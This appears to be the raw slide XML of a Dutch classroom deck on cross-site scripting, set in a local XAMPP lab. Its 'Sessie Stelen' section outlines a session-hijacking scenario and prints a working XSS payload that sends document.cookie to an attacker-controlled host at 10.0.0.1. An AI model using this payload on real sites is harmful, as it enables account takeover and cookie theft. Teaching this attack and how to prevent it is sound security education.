              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessiecookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>po45pok5</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Rechte verbindingslijn met pijl 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7194620" y="5048158"/>
            <a:ext cx="562766" cy="352453"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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Rechte verbindingslijn met pijl 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7365442" y="3803159"/>
            <a:ext cx="389613" cy="29446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kstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251706" y="4057338"/>
            <a:ext cx="2182240" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De webserver houdt van iedere sessie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Sessie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> variabelen bij van de ingelogde user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SessieCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is daarbij leidend.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236441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5.Sessie Stelen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Sessie Stelen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954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> XSS willen we nu de groene sessie overnemen zodat we bij de sessiegegevens kunnen komen.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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610133" y="3032262"/>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fbeeldingsresultaat voor office computer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677486" y="4832939"/>
            <a:ext cx="1316392" cy="13247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fbeeldingsresultaat voor web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3502" y="3891280"/>
            <a:ext cx="1003390" cy="12022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Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="3818374"/>
            <a:ext cx="2180492" cy="475155"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent3">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Rechte verbindingslijn met pijl 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4170066" y="4913644"/>
            <a:ext cx="2180492" cy="383904"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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7" name="Tekstvak 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857811" y="3267939"/>
            <a:ext cx="2703007" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessie 1 met $_SESSION[]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naam='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>karelh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password='123'</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Tekstvak 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857810" y="2898607"/>
            <a:ext cx="2703007" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessiecookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eh424hwde</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Tekstvak 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857812" y="5232824"/>
            <a:ext cx="2703007" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sessie 1 met $_SESSION[]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Naam='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>karelh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Password='123'</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Tekstvak 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857811" y="4863492"/>
            <a:ext cx="2703007" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessiecookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>po45pok5</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Rechte verbindingslijn met pijl 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7194620" y="5048158"/>
            <a:ext cx="562766" cy="352453"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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Rechte verbindingslijn met pijl 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7365442" y="3803159"/>
            <a:ext cx="389613" cy="29446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kstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251706" y="4057338"/>
            <a:ext cx="2182240" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De webserver houdt van iedere sessie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Sessie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> variabelen bij van de ingelogde user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SessieCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is daarbij leidend.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26908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5.Sessie Stelen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Sessie Stelen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3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Het scenario wordt als volgt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>1. De hacker zet een website op om het cookie te stelen. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>idg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> op de 10.0.0.1 machine, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessionsteal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pdo_SS.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2. Met XSS wordt er code ge-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> waardoor het sessiecookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     naar bovenstaande website wordt gestuurd.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> browser met de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>add-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> "cookie-manager</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     wordt een bestaand sessiecookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>vervange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> door het</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     gestolen cookie.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>4.  BINGO. Sessie over genomen......</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Tekstvak 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7516168" y="5638512"/>
            <a:ext cx="3716806" cy="923330"/>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bestudeer de pagina's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pdo_SS.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pdo_showSS.php</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>en zorg dat XAMPP gestart is!!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="672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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testopstelling maken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>1.Onschuldige "spielerei"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.Klieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>3.Klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>4.Misleiding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>5.Sessie Stelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS voorkomen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht</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3102854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5.Sessie Stelen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Sessie Stelen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Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Start een eigen sessie (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)  in Firefox en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>script&gt;new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>10.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionsteal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo_SS.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>SC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>=" +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0"/>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>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Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
